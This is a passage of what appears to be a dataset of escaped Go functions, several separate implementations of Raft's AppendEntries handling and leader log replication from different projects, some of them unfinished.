log\n\t\t\t\t\t// entries, we need to call InstallSnapshot!\n\t\t\t\t\t//\n\t\t\t\t\trf.Log(LogInfo, \"Failed to AppendEntries to server\", servIdx, \"\\n - IndexFirstConflictingTerm\", replies[servIdx].IndexFirstConflictingTerm, \"\\n - ConflictingEntryTerm\", replies[servIdx].ConflictingEntryTerm, \"\\n - LastLogIndex\", replies[servIdx].LastLogIndex)\n\t\t\t\t\tif replies[servIdx].ConflictingEntryTerm == -1 {\n\t\t\t\t\t\t// case 1 - follower has no entry at the given location\n\t\t\t\t\t\trf.nextIndex[servIdx] = replies[servIdx].LastLogIndex + 1\n\t\t\t\t\t} else {\n\t\t\t\t\t\t// if not case 1, need to check we have the logs at and beyond\n\t\t\t\t\t\t// IndexFirstConflictingTerm\n\t\t\t\t\t\traftLogIdx := rf.getTrimmedLogIndex(replies[servIdx].IndexFirstConflictingTerm)\n\t\t\t\t\t\tif raftLogIdx == -1 {\n\t\t\t\t\t\t\t// don't have the logs we need - will need to snapshot\n\t\t\t\t\t\t\t// set nextIndex to the lastIncludedIndex to force this\n\t\t\t\t\t\t\trf.nextIndex[servIdx] = rf.lastIncludedIndex\n\t\t\t\t\t\t} else {\n\t\t\t\t\t\t\tif rf.log[raftLogIdx].Term != replies[servIdx].ConflictingEntryTerm {\n\t\t\t\t\t\t\t\t// case 2 - follower has a term not seen by leader\n\t\t\t\t\t\t\t\trf.Log(LogDebug, \"Case 2: follower has a term not seen by leader\")\n\t\t\t\t\t\t\t\trf.nextIndex[servIdx] = replies[servIdx].IndexFirstConflictingTerm\n\t\t\t\t\t\t\t} else {\n\t\t\t\t\t\t\t\t// case 3 - follower has a term seen by leader\n\t\t\t\t\t\t\t\t// need to go to latest entry that leader has with this term\n\t\t\t\t\t\t\t\trf.Log(LogDebug, \"Case 3: follower has a term seen by leader, finding leader's latest entry with this term \\n - rf.log[\", rf.log)\n\t\t\t\t\t\t\t\trf.nextIndex[servIdx] = replies[servIdx].IndexFirstConflictingTerm\n\t\t\t\t\t\t\t\tfor rf.log[rf.getTrimmedLogIndex(rf.nextIndex[servIdx])].Term == replies[servIdx].ConflictingEntryTerm {\n\t\t\t\t\t\t\t\t\trf.nextIndex[servIdx]++\n\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t}\n\n\t\t\t\t// if we need to install a snapshot, then\n\t\t\t\t// nextIndex becomes the next index after the snapshot we will install\n\t\t\t\t// notice that we will then immediately send an AppendEntries request to the server,\n\t\t\t\t// and it will fail until the snapshot is installed, and we will just keep\n\t\t\t\t// resetting nextIndex\n\t\t\t\tif rf.nextIndex[servIdx] <= rf.lastIncludedIndex {\n\t\t\t\t\trf.Log(LogInfo, \"Failed to AppendEntries to server\", servIdx, \"- need to send InstallSnapshot!\")\n\t\t\t\t\trf.nextIndex[servIdx] = rf.lastIncludedIndex + 1\n\n\t\t\t\t\t// actually call the RPC\n\t\t\t\t\targs := &InstallSnapshotArgs{\n\t\t\t\t\t\tLeaderTerm: rf.currentTerm,\n\t\t\t\t\t\tSnapshot: rf.persister.ReadSnapshot(),\n\t\t\t\t\t}\n\t\t\t\t\treply := &InstallSnapshotReply{}\n\t\t\t\t\tgo rf.sendInstallSnapshot(servIdx, args, reply)\n\t\t\t\t}\n\n\t\t\t\t// send a new append entries request to the server if the last one has finished\n\t\t\t\trf.Log(LogDebug, \"rf.nextIndex for server\", servIdx, \"set to idx\", rf.nextIndex[servIdx], \"\\n - rf.log\", rf.log, \"\\n - rf.lastIncludedIndex\", rf.lastIncludedIndex, \"\\n - rf.lastIncludedTerm\", rf.lastIncludedTerm)\n\t\t\t\tentries := []LogEntry{}\n\t\t\t\tif len(rf.log) > 0 {\n\t\t\t\t\tentries = rf.log[rf.getTrimmedLogIndex(rf.nextIndex[servIdx]):]\n\t\t\t\t}\n\t\t\t\targs := &AppendEntriesArgs{\n\t\t\t\t\tLeaderTerm: rf.currentTerm,\n\t\t\t\t\tLeaderCommitIndex: rf.commitIndex,\n\t\t\t\t\tLogEntries: entries,\n\t\t\t\t}\n\n\t\t\t\t// only place the reply into replies, when the RPC completes,\n\t\t\t\t// to prevent partial data (unsure if this can happen but seems like a good idea)\n\t\t\t\tgo func(servIdx int) {\n\t\t\t\t\trf.Log(LogDebug, \"sendAppendEntries to servIdx\", servIdx)\n\t\t\t\t\treply := &AppendEntriesReply{}\n\t\t\t\t\tok := rf.sendAppendEntries(servIdx, args, reply)\n\t\t\t\t\tif ok {\n\t\t\t\t\t\trf.Log(LogDebug, \"Received AppendEntries reply from server\", servIdx, \"\\n - reply\", reply)\n\t\t\t\t\t\treplies[servIdx] = reply\n\t\t\t\t\t}\n\t\t\t\t}(servIdx)\n\t\t\t}\n\t\t}\n\n\t\t// walk up through possible new commit indices\n\t\t// update commit index\n\t\torigIndex := rf.commitIndex\n\t\tnewIdx := rf.commitIndex + 1\n\t\tfor len(rf.log) > 0 && newIdx <= rf.log[len(rf.log)-1].Index {\n\t\t\treplicas := 1 // already replicated in our log\n\t\t\tfor servIdx := range rf.peers {\n\t\t\t\tif servIdx != rf.me && rf.matchIndex[servIdx] >= newIdx {\n\t\t\t\t\treplicas++\n\t\t\t\t}\n\t\t\t}\n\t\t\tif replicas >= int(math.Ceil(float64(len(rf.peers))/2.0)) &&\n\t\t\t\tnewIdx > rf.lastIncludedIndex &&\n\t\t\t\trf.getTrimmedLogIndex(newIdx) >= 0 &&\n\t\t\t\trf.log[rf.getTrimmedLogIndex(newIdx)].Term == rf.currentTerm {\n\t\t\t\trf.commitIndex = newIdx\n\t\t\t\trf.Log(LogInfo, \"Entry \", rf.log[rf.getTrimmedLogIndex(rf.commitIndex)], \"replicated on a majority of servers. Commited to index\", rf.commitIndex)\n\t\t\t}\n\t\t\tnewIdx++\n\t\t}\n\n\t\t// send messages to applyCh for every message that was committed\n\t\tfor origIndex < rf.commitIndex {\n\t\t\torigIndex++\n\t\t\tif rf.getTrimmedLogIndex(origIndex) >= 0 {\n\t\t\t\trf.Log(LogInfo, \"Sending applyCh confirmation for commit of \", rf.log[rf.getTrimmedLogIndex(origIndex)], \"at index\", origIndex)\n\t\t\t\t{\n\t\t\t\t\trf.applyCh <- ApplyMsg{\n\t\t\t\t\t\tCommandValid: true,\n\t\t\t\t\t\tCommandIndex: origIndex,\n\t\t\t\t\t\tCommandTerm: rf.currentTerm,\n\t\t\t\t\t\tCommand: rf.log[rf.getTrimmedLogIndex(origIndex)].Command,\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t\trf.mu.Unlock()\n\t\ttime.Sleep(heartbeatSendInterval)\n\t}\n}", "func (rf *Raft) AppendEntries(args AppendEntriesArgs, reply *AppendEntriesReply) error {\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\tif rf.state == Down {\n\t\treturn nil\n\t}\n\n\tlog.Printf(\"[%v] received AppendEntries RPC call: Args%+v\", rf.me, args)\n\tif args.Term > rf.currentTerm {\n\t\tlog.Printf(\"[%v] currentTerm=%d out of date with AppendEntriesArgs.Term=%d\",\n\t\t\trf.me, rf.currentTerm, args.Term)\n\t\trf.toFollower(args.Term)\n\t\trf.leader = args.Leader\n\t}\n\n\treply.Success = false\n\tif args.Term == rf.currentTerm {\n\t\t// two leaders can't coexist. if Raft rfServer receives AppendEntries() RPC, another\n\t\t// leader already exists in this term\n\t\tif rf.state != Follower {\n\t\t\trf.toFollower(args.Term)\n\t\t\trf.leader = args.Leader\n\t\t}\n\t\trf.resetElection = time.Now()\n\n\t\t// does follower log match leader's (-1 is valid)\n\t\tif args.PrevLogIndex == -1 ||\n\t\t\t(args.PrevLogIndex < len(rf.log) && args.PrevLogTerm == rf.log[args.PrevLogIndex].Term) {\n\t\t\treply.Success = true\n\n\t\t\t// merge follower's log with leader's log starting from args.PrevLogTerm\n\t\t\t// skip entries where the term matches where term matches with args.Entries\n\t\t\t// and insert args.Entries from mismatch index\n\t\t\tinsertIdx, appendIdx := args.PrevLogIndex + 1, 0\n\t\t\tfor {\n\t\t\t\tif insertIdx >= len(rf.log) || appendIdx >= len(args.Entries) {\n\t\t\t\t\tbreak\n\t\t\t\t}\n\t\t\t\tif rf.log[insertIdx].Term != args.Entries[appendIdx].Term {\n\t\t\t\t\tbreak\n\t\t\t\t}\n\t\t\t\tinsertIdx++\n\t\t\t\tappendIdx++\n\t\t\t}\n\t\t\t// At the end of this loop:\n\t\t\t// - insertIdx points at the end of the log, or an index where the\n\t\t\t// term mismatches with an entry from the leader\n\t\t\t// - appendIdx points at the end of Entries, or an index where the\n\t\t\t// term mismatches with the corresponding log entry\n\t\t\tif appendIdx < len(args.Entries) {\n\t\t\t\tlog.Printf(\"[%v] append new entries %+v from %d\", rf.me,\n\t\t\t\t\targs.Entries[appendIdx:], insertIdx)\n\t\t\t\trf.log = append(rf.log[:insertIdx], args.Entries[appendIdx:]...)\n\t\t\t\tlog.Printf(\"[%v] new log: %+v\", rf.me, rf.log)\n\t\t\t}\n\n\t\t\t// update rf.commitIndex if the leader considers additional log entries as committed\n\t\t\tif args.LeaderCommit > rf.commitIndex {\n\t\t\t\tif args.LeaderCommit < len(rf.log)-1 {\n\t\t\t\t\trf.commitIndex = args.LeaderCommit\n\t\t\t\t} else {\n\t\t\t\t\trf.commitIndex = len(rf.log)-1\n\t\t\t\t}\n\n\t\t\t\tlog.Printf(\"[%v] updated commitIndex:%d\", rf.me, rf.commitIndex)\n\t\t\t\trf.readyCh <- struct{}{}\n\t\t\t}\n\t\t} else {\n\t\t\t// PrevLogIndex and PrevLogTerm didn't match\n\t\t\t// set ConflictIndex and ConflictTerm to allow leader to send the right entries quickly\n\t\t\tif args.PrevLogIndex >= len(rf.log) {\n\t\t\t\treply.ConflictIndex = len(rf.log)\n\t\t\t\treply.ConflictTerm = -1\n\t\t\t} else {\n\t\t\t\t// PrevLogTerm doesn't match\n\t\t\t\treply.ConflictTerm = rf.log[args.PrevLogIndex].Term\n\t\t\t\tvar idx int\n\t\t\t\tfor idx = args.PrevLogIndex - 1; idx >= 0; idx-- {\n\t\t\t\t\tif rf.log[idx].Term != reply.ConflictTerm {\n\t\t\t\t\t\tbreak\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\treply.ConflictIndex = idx + 1\n\t\t\t}\n\t\t}\n\t}\n\n\treply.Term = rf.currentTerm\n\trf.persist()\n\tlog.Printf(\"[%v] AppendEntriesReply sent: %+v\", rf.me, reply)\n\treturn nil\n}", "func (rf *Raft) AppendEntries(args AppendEntriesArgs, reply *AppendEntriesReply) {\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\treply.Term = rf.currentTerm\n\tif args.Term < rf.currentTerm {\n\t\t// fmt.Printf(\"APPEND_FAIL0 : %v append with %v, return %v\\n\", rf.me, args.Term, reply.Term)\n\t\treturn\n\t}\n\n\trf.heartbeatChan <- true\n\tif args.Term > rf.currentTerm {\n\t\trf.currentTerm = args.Term\n\t\trf.toFollower()\n\t\trf.persist()\n\t}\n\n\t// fmt.Printf(\"APPEND_TRY : %v append with %v/ %v, %v/ %v\\n\", rf.me, len(rf.log), args.PrevLogIndex, rf.log[args.PrevLogIndex].Term, args.PrevLogTerm)\n\n\tif len(rf.log) <= args.PrevLogIndex {\n\t\treply.Success = false\n\t\treply.LogIndex = len(rf.log)\n\t\t// fmt.Printf(\"APPEND_FAIL1 : %v append with %v, return %v\\n\", rf.me, args.PrevLogIndex, reply.LogIndex)\n\t\treturn\n\t}\n\n\tif rf.log[args.PrevLogIndex].Term != args.PrevLogTerm {\n\t\treply.Success = false\n\t\t// find first one that have same term with entries\n\t\tfor i := args.PrevLogIndex - 1; i > 0; i-- {\n\t\t\tif rf.log[i].Term == args.PrevLogTerm {\n\t\t\t\treply.LogIndex = i\n\t\t\t} else {\n\t\t\t\tbreak\n\t\t\t}\n\t\t}\n\t\tif reply.LogIndex < 1 {\n\t\t\treply.LogIndex = 1\n\t\t}\n\t\t// fmt.Printf(\"APPEND_FAIL2 : %v append with %v, %v, return %v\\n\", rf.me, rf.log[args.PrevLogIndex].Term, args.PrevLogTerm, reply.LogIndex)\n\t\treturn\n\t}\n\n\tif len(args.Entries) > 0 {\n\t\t// fmt.Printf(\"APPEND : %v append with %v, %v\\n\", rf.me, args.Entries[0].Term, args.Entries)\n\t}\n\n\trf.log = rf.log[:args.PrevLogIndex+1]\n\tfor _, log := range args.Entries {\n\t\trf.log = append(rf.log, log)\n\t}\n\trf.persist()\n\n\tif args.LeaderCommit > rf.commitIndex {\n\t\trf.commit(args.LeaderCommit)\n\t}\n\treply.LogIndex = len(rf.log)\n}", "func (r *Raft) handleAppendEntries(m pb.Message) {\n\tif m.Term >= r.Term {\n\t\t// if not a follower\n\t\tr.becomeFollower(m.Term, m.From)\n\t\t// check if m.prevLog exists\n\t\ttargetTerm, err := r.RaftLog.Term(m.Index)\n\t\tif err != nil && m.Index > 0 {\n\t\t\tr.rejectAppendEntries(m)\n\t\t\treturn\n\t\t}\n\t\tif targetTerm != m.LogTerm {\n\t\t\tr.rejectAppendEntries(m)\n\t\t\treturn\n\t\t} else {\n\t\t\tr.forceAppendEntries(m)\n\t\t\tr.updateCommittedIndex(m)\n\t\t\tr.acceptAppendEntries(m)\n\t\t\t//r.RaftLog.stabled = r.RaftLog.committed\n\t\t\treturn\n\t\t}\n\t} else {\n\t\tr.rejectAppendEntries(m)\n\t\treturn\n\t}\n\n}", "func (s *raftServer) handleFollowers(followers []int, nextIndex *utils.SyncIntIntMap, matchIndex *utils.SyncIntIntMap, aeToken *utils.SyncIntIntMap) {\n\tfor s.State() == LEADER {\n\t\tfor _, f := range followers {\n\t\t\tlastIndex := s.localLog.TailIndex()\n\t\t\tn, ok := nextIndex.Get(f)\n\t\t\tif !ok {\n\t\t\t\tpanic(\"nextIndex not found for follower \" + strconv.Itoa(f))\n\t\t\t}\n\n\t\t\tunlocked, ok := aeToken.Get(f)\n\n\t\t\tif !ok {\n\t\t\t\tpanic(\"aeToken not found for follower \" + strconv.Itoa(f))\n\t\t\t}\n\n\t\t\tif lastIndex != 0 && lastIndex >= n && unlocked == 1 {\n\t\t\t\taeToken.Set(f, 0)\n\t\t\t\t// send a new AppendEntry\n\t\t\t\tprevIndex := n - 1\n\t\t\t\tvar prevTerm int64 = 0\n\t\t\t\t// n = 0 when we add first entry to the log\n\t\t\t\tif prevIndex > 0 {\n\t\t\t\t\tprevTerm = s.localLog.Get(prevIndex).Term\n\t\t\t\t}\n\t\t\t\tae := &AppendEntry{Term: s.Term(), LeaderId: s.server.Pid(), PrevLogIndex: prevIndex, PrevLogTerm: prevTerm}\n\t\t\t\tae.LeaderCommit = s.commitIndex.Get()\n\t\t\t\tae.Entry = *s.localLog.Get(n)\n\t\t\t\ts.writeToLog(\"Replicating entry \" + strconv.FormatInt(n, 10))\n\t\t\t\ts.server.Outbox() <- &cluster.Envelope{Pid: f, Msg: ae}\n\t\t\t}\n\t\t}\n\t\ttime.Sleep(NICE * time.Millisecond)\n\t}\n}", "func (rf *Raft) AppendEntries(args *AppendEntriesArgs, reply *AppendEntriesReply) {\n\tif len(args.Entries) > 0 {\n\t\tDPrintf(\"peer-%d gets an AppendEntries RPC(args.LeaderId = %d, args.PrevLogIndex = %d, args.LeaderCommit = %d, args.Term = %d, rf.currentTerm = %d).\", rf.me, args.LeaderId, args.PrevLogIndex, args.LeaderCommit, args.Term, rf.currentTerm)\n\t} else {\n\t\tDPrintf(\"peer-%d gets an heartbeat(args.LeaderId = %d, args.Term = %d, args.PrevLogIndex = %d, args.LeaderCommit = %d).\", rf.me, args.LeaderId, args.Term, args.PrevLogIndex, args.LeaderCommit)\n\t}\n\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\n\t// initialize the reply.\n\treply.ConflictIndex = 1\n\treply.ConflictTerm = 0\n\t// 1. detect obsolete information, this can filter out old leader's heartbeat.\n\tif args.Term < rf.currentTerm {\n\t\tDPrintf(\"peer-%d got an obsolete AppendEntries RPC..., ignore it.(args.Term = %d, rf.currentTerm = %d.)\", rf.me, args.Term, rf.currentTerm)\n\t\treply.Term = rf.currentTerm\n\t\treply.Success = false\n\t\treturn\n\t}\n\n\t/* Can the old Leader receive an AppendEntries RPC from the new leader?\n\t * I think the answer is yes.\n\t * The old leader's heartbeat packets lost all the time,\n\t * and others will be elected as the new leader(may do not need this peer's vote, consider a 3 peers cluster),\n\t * then the new leader will heartbeat the old leader. So the old leader will learn this situation and convert to a Follower.\n\t */\n\n\t// reset the election timeout as soon as possible to prevent an unneeded election!\n\trf.resetElectionTimeout()\n\trf.currentTerm = args.Term\n\trf.persist()\n\treply.Term = args.Term\n\n\tif rf.state == Candidate {\n\t\tDPrintf(\"peer-%d calm down from a Candidate to a Follower!!!\", rf.me)\n\t\trf.state = Follower\n\t} else if rf.state == Leader {\n\t\tDPrintf(\"peer-%d degenerate from a Leader to a Follower!!!\", rf.me)\n\t\trf.state = Follower\n\t\trf.nonleaderCh <- true\n\t}\n\n\t// consistent check\n\t// 2. Reply false(refuse the new entries) if log doesn't contain an entry at prevLogIndex whose term matches prevLogTerm($5.3)\n\tif len(rf.log) < args.PrevLogIndex {\n\t\t// Then the leader will learn this situation and adjust this follower's matchIndex/nextIndex in its state, and AppendEntries RPC again.\n\t\treply.Success = false\n\t\treturn\n\t}\n\n\tif args.PrevLogIndex > 0 && rf.log[args.PrevLogIndex-1].Term != args.PrevLogTerm {\n\t\t// 3. If an existing entry conflicts with a new one(same index but different terms), delete the existing entry and all that follow it.\n\t\t// delete the log entries from PrevLogIndex to end(including PrevLogIndex).\n\t\tDPrintf(\"peer-%d fail to pass the consistency check, truncate the log\", rf.me)\n\t\trf.log = rf.log[:args.PrevLogIndex-1] // log[i:j] contains i~j-1, and we don't want to reserve log entry at PrevLogIndex. So...\n\t\trf.persist()\n\t\treply.Success = false\n\t\treply.ConflictTerm = rf.log[args.PrevLogIndex-2].Term\n\t\t// fill the reply.FirstIndexOfThatTerm\n\t\ti := 1\n\t\tfor i = args.PrevLogIndex - 1; i >= 1; i-- {\n\t\t\tif rf.log[i-1].Term == reply.ConflictTerm {\n\t\t\t\tcontinue\n\t\t\t} else {\n\t\t\t\tbreak\n\t\t\t}\n\t\t}\n\t\treply.ConflictIndex = i + 1\n\t\treturn\n\t}\n\n\t// 4. Now this peer's log matches the leader's log at PrevLogIndex. Append any new entries not already in the log\n\tDPrintf(\"peer-%d AppendEntries RPC pass the consistent check at PrevLogIndex = %d!\", rf.me, args.PrevLogIndex)\n\t// now logs match at PrevLogIndex\n\t// NOTE: only if the logs don't match at PrevLogIndex, truncate the rf.log.\n\tpos := args.PrevLogIndex // pos is the index of the slice just after the element at PrevLogIndex.\n\ti := 0\n\tmismatch := false\n\tfor pos < len(rf.log) && i < len(args.Entries) {\n\t\tif rf.log[pos].Term == args.Entries[i].Term {\n\t\t\ti++\n\t\t\tpos++\n\t\t} else {\n\t\t\t// conflict!\n\t\t\tmismatch = true\n\t\t\tbreak\n\t\t}\n\t}\n\n\tif mismatch {\n\t\t// need adjustment. rf.log[pos].Term != args.Entries[i].Term\n\t\t// truncate the rf.log and append entries.\n\t\trf.log = rf.log[:pos]\n\t\trf.log = append(rf.log, args.Entries[i:]...)\n\t\trf.persist()\n\t} else {\n\t\t// there some elements in entries but not in rf.log\n\t\tif pos == len(rf.log) && i < len(args.Entries) {\n\t\t\trf.log = rf.log[:pos]\n\t\t\trf.log = append(rf.log, args.Entries[i:]...)\n\t\t\trf.persist()\n\t\t}\n\t}\n\t// now the log is consistent with the leader's. from 0 ~ PrevLogIndex + len(Entries). but whether the subsequents are consistent is unknown.\n\treply.Success = true\n\t// update the rf.commitIndex. If leaderCommit > commitIndex, set commitIndex = min(leaderCommit, index of last new entry)\n\tif rf.commitIndex < args.LeaderCommit {\n\t\t// we need to update commitIndex locally. Explictly update the old entries. See my note upon Figure8.\n\t\t// This step will exclude some candidates to be elected as the new leader!\n\t\t// commit!\n\t\told_commit_index := rf.commitIndex\n\n\t\tif args.LeaderCommit <= len(rf.log) {\n\t\t\trf.commitIndex = args.LeaderCommit\n\t\t} else {\n\t\t\trf.commitIndex = len(rf.log)\n\t\t}\n\t\tDPrintf(\"peer-%d Nonleader update its commitIndex from %d to %d. And it's len(rf.log) = %d.\", rf.me, old_commit_index, rf.commitIndex, len(rf.log))\n\n\t\t// apply. Now all the commands before rf.commitIndex will not be changed, and could be applied.\n\t\tgo func() {\n\t\t\trf.canApplyCh <- true\n\t\t}()\n\t}\n\treturn\n}", "func (rf *Raft) AppendEntries(args *AppendEntriesArgs, reply *AppendEntriesReply) {\n\t// lock\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\tlocalTerm := rf.currentTerm\n\tlogSize := len(rf.log)\n\t// init reply. Term to localTerm\n\treply.Term = localTerm\n\treply.PeerId = rf.me\n\treply.Success = false\n\treply.ConflictTerm = -1\n\treply.FirstIndex = -1\n\t// begin to check.\n\t// 1. check term.\n\tDPrintf(\"Peer-%d has reveived new append request: %v, local: term=%d.\", rf.me, *args, localTerm)\n\tif localTerm > args.Term {\n\t\treply.Success = false\n\t\treturn\n\t} else if localTerm < args.Term {\n\t\trf.currentTerm = args.Term\n\t\trf.transitionState(NewTerm)\n\t\tgo func() {\n\t\t\trf.eventChan <- NewTerm\n\t\t}()\n\t}\n\t// 2. process heartbeat.\n\tappendEntriesLen := 0\n\tif args.Entries != nil {\n\t\tappendEntriesLen = len(args.Entries)\n\t}\n\t// localTerm <= args.Term, it should receive heartbeat.\n\tif appendEntriesLen <= 0 || args.Entries[0].Command == nil {\n\t\t// when receive heartbeat, we should turn from Canditate to Follower.\n\t\trf.transitionState(HeartBeat)\n\t\trf.voteFor = args.LeaderId\n\t\tDPrintf(\"Peer-%d try to send heartbeat message.\", rf.me)\n\t\t// to send msg should void deadlock:\n\t\t// A -> B.AppendEntries, B hold the lock and send msg;\n\t\t// B.electionService, B try to hold lock to process, if not, it wait, so can not receive msg.\n\t\t// send message to heartbeat channel.\n\t\tgo func() {\n\t\t\trf.eventChan <- HeartBeat\n\t\t}()\n\t\tDPrintf(\"Peer-%d received heartbeat from peer-%d.\", rf.me, args.LeaderId)\n\t}\n\t// 3. the term is the same, check term of the previous log.\n\tprevLogIndex := args.PrevLogIndex\n\tprevLogTerm := args.PrevLogTerm\n\t// 3.1. check arguments.\n\tif prevLogTerm < 0 || prevLogIndex < 0 || prevLogIndex >= logSize {\n\t\treply.Success = false\n\t\tif prevLogIndex >= logSize && logSize > 0 {\n\t\t\t// if the leader's log are more than follower's\n\t\t\treply.FirstIndex = logSize\n\t\t\t// reply.ConflictTerm = rf.log[logSize-1].Term\n\t\t}\n\t\treturn\n\t}\n\t// 3.2. check previous log's term.\n\tlocalPrevLogTerm := rf.log[prevLogIndex].Term\n\tDPrintf(\"Peer-%d local: prevLogTerm=%d, prevLogIndex=%d.\", rf.me, localPrevLogTerm, prevLogIndex)\n\tif prevLogTerm != localPrevLogTerm {\n\t\treply.Success = false\n\t\t// t[MaTo find the first index of conflict term.\n\t\tconflictTerm := localPrevLogTerm\n\t\treply.ConflictTerm = conflictTerm\n\t\t// TODO: replace this loop with binary search.\n\t\t// The lower boundary is the commintIndex, because all the entries below commitIndex have been commit.\n\t\tfor i := prevLogIndex; i >= rf.commitIndex; i-- {\n\t\t\tif rf.log[i].Term != conflictTerm {\n\t\t\t\treply.FirstIndex = i + 1\n\t\t\t\tbreak\n\t\t\t}\n\t\t}\n\t\tDPrintf(\"Peer-%d find conflictTerm index, reply=%v, log=%v.\", rf.me, reply, rf.log)\n\t\tif reply.FirstIndex == -1 {\n\t\t\treply.FirstIndex = rf.commitIndex + 1\n\t\t}\n\t\treturn\n\t}\n\t// 4. the previous log's term is the same, we can update commitIndex and append log now.\n\t// 4.1. update commit index.\n\tif args.LeaderCommit > rf.commitIndex {\n\t\tDPrintf(\"Peer-%d set commitIndex=%d, origin=%d, from leader-%d.\", rf.me, args.LeaderCommit, rf.commitIndex, args.LeaderId)\n\t\trf.commitIndex = args.LeaderCommit\n\t}\n\t// 5. begin to append log.\n\t// 5.1. to find the same log between local log and args log.\n\tfirstDiffLogPos := -1\n\tappendPos := prevLogIndex + 1\n\tif appendEntriesLen > 0 {\n\t\tfor argsLogIndex, appendEntry := range args.Entries {\n\t\t\t// localLogsIndex points to local log, its start position is prevLogIndex + 1;\n\t\t\t// argsLogIndex points to args' log entries, start from 0;\n\t\t\t// compaire local log and args log one by one.\n\t\t\tif appendPos < logSize && rf.log[appendPos].Term == appendEntry.Term {\n\t\t\t\tappendPos += 1 // move local log' pointer to next one.\n\t\t\t\tcontinue\n\t\t\t} else {\n\t\t\t\tfirstDiffLogPos = argsLogIndex\n\t\t\t\tbreak\n\t\t\t}\n\t\t}\n\t}\n\t// 5.2. do append.\n\tif firstDiffLogPos != -1 {\n\t\t// cut log to position=appendPos - 1\n\t\tif appendPos > 0 {\n\t\t\trf.log = rf.log[0:appendPos]\n\t\t}\n\t\t// append the different part of args.Entries to log.\n\t\trf.log = append(rf.log, args.Entries[firstDiffLogPos:]...)\n\t\trf.persist()\n\t\tDPrintf(\"Peer-%d append entries to log, log' length=%d, log=%v\\n\", rf.me, len(rf.log), rf.log)\n\t} else {\n\t\tif appendEntriesLen > 0 {\n\t\t\tDPrintf(\"Peer-%d do not append duplicate log.\\n\", rf.me)\n\t\t}\n\t}\n\t// 6. reply.\n\treply.Term = localTerm\n\treply.Success = true\n\treturn\n}", "func (r *RaftNode) handleAppendEntries(msg AppendEntriesMsg) (resetTimeout, fallback bool) {\n\tif len(msg.request.GetEntries()) > 0 {\n\t\tr.Debug(\"Got appendEntries with %d entries from %v\", len(msg.request.GetEntries()), msg.request.GetLeader())\n\t} else {\n\t\tr.Verbose(\"Got appendEntries heartbeat from %v\", msg.request.GetLeader().Id)\n\t}\n\n\t// resetTimeout == request successful\n\tif msg.request.GetTerm() < r.GetCurrentTerm() {\n\t\t// if the leader calling us is behind the times the request is unsuccessful, and it should revert\n\t\tmsg.reply <- AppendEntriesReply{r.GetCurrentTerm(), false} // our term is greater the leader's\n\t\treturn false, false\n\n\t} else {\n\t\t// node has higher or equivalent term and so this is an acceptable heartbeat\n\t\t// make sure we have this leader as our leader and the correct term\n\t\tr.updateTermIfNecessary(msg.request.GetTerm())\n\n\t\t// no matter our state, we'll always be reverting to a follower when getting an AppendEntries,\n\t\t// so set our leader to be the cluster leader (who will also be the one who sent the message)\n\t\tr.Leader = msg.request.GetLeader()\n\n\t\tsuccess := r.mergeLogEntries(msg.request)\n\t\tmsg.reply <- AppendEntriesReply{r.GetCurrentTerm(), success}\n\n\t\t// always \"fall back\", but this will only be utilized by leaders and candidates\n\t\treturn true, true\n\t}\n}", "func (r *Raft) callAppendEntries(server int, args appendEntriesArgs, reply *appendEntriesReply) bool {\n\t// When there are no peers, return a test response, if any.\n\tif len(r.peers) == 0 {\n\t\t// Under test, return injected reply.\n\t\tglog.V(2).Infof(\"Under test, returning injected reply %v\", reply)\n\t\tif r.testAppendentriessuccess {\n\t\t\t*reply = *r.testAppendentriesreply\n\t\t}\n\t\treturn r.testAppendentriessuccess\n\t}\n\tok := r.peers[server].Call(\"Raft.AppendEntries\", args, reply)\n\treturn ok\n}", "func (rf *Raft) AppendEntries(args *AppendEntriesArgs, reply *AppendEntriesReply) {\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\t// Resetting as we received a heart beat.\n\trf.resetElectionTimer()\n\trf.debug( \"AppendEntries: from LEADER %#v \\n\",args)\n\trf.debug(\"My current state: %#v \\n\", rf)\n\t//1. Reply false if term < currentTerm (§5.1)\n\tif args.Term > rf.currentTerm{\n\t\tif rf.currentState != Follower {\n\t\t\trf.transitionToFollower(args.Term)\n\t\t}\n\t}\n\t//2. Reply false if log doesn’t contain an entry at prevLogIndex\n\t//whose term matches prevLogTerm (§5.3)\n\t//3. If an existing entry conflicts with a new one (same index\n\t//but different terms), delete the existing entry and all that\n\t//follow it (§5.3)\n\t//4. Append any new entries not already in the log\n\t//5. If leaderCommit > commitIndex, set commitIndex =\n\t//\tmin(leaderCommit, index of last new entry)\n\t/////////////Pending implementation point 5 above.\n\tif args.Term < rf.currentTerm{\n\t\treply.Success = false\n\t\treply.Term =rf.currentTerm\n\t\treturn\n\t}\n\n\t// Update my term to that of the leaders\n\trf.currentTerm = args.Term\n\trf.debug(\"Dereferencing %d\",len(rf.log)-1)\n\trf.debug(\"Current log contents %v\", rf.log)\n\n\t// Check first whether it is a heartbeat or an actual append entry.\n\t// If it is heartbeat, then just reset the timer and then go back.\n\t//Otherwise, we need to add the entries into the logs of this peer.\n\t// If this is heart beat, then we know that the command is going to be nil.\n\t// Identify this and return.\n\tlastLogEntryIndex := len(rf.log) - 1\n\tif args.LogEntries == nil {\n\t\t//This is heart beat\n\t\treply.Term = rf.currentTerm\n\t\trf.debug(\"Received a HEART BEAT.\")\n\t}else {\n\t\trf.debug(\"Received an APPEND ENTRY. PROCESSING\")\n\t\tlastLogEntry := rf.log[len(rf.log)-1]\n\t\t//1a\n\t\tif lastLogEntryIndex < args.PreviousLogIndex {\n\t\t\treply.Success = false\n\t\t\treply.NextIndex = lastLogEntryIndex\n\t\t\trf.debug(\"1a \\n\")\n\t\t\treturn\n\t\t}\n\t\t//1b\n\t\tif lastLogEntryIndex > args.PreviousLogIndex {\n\t\t\treply.Success = false\n\t\t\trf.debug(\"Last log entry index --> %d, PreviousLogIndex From LEADER -->%d\", lastLogEntryIndex, args.PreviousLogIndex)\n\t\t\trf.log = rf.log[:len(rf.log)-1]\n\t\t\treturn\n\t\t}\n\t\t//3\n\t\tif 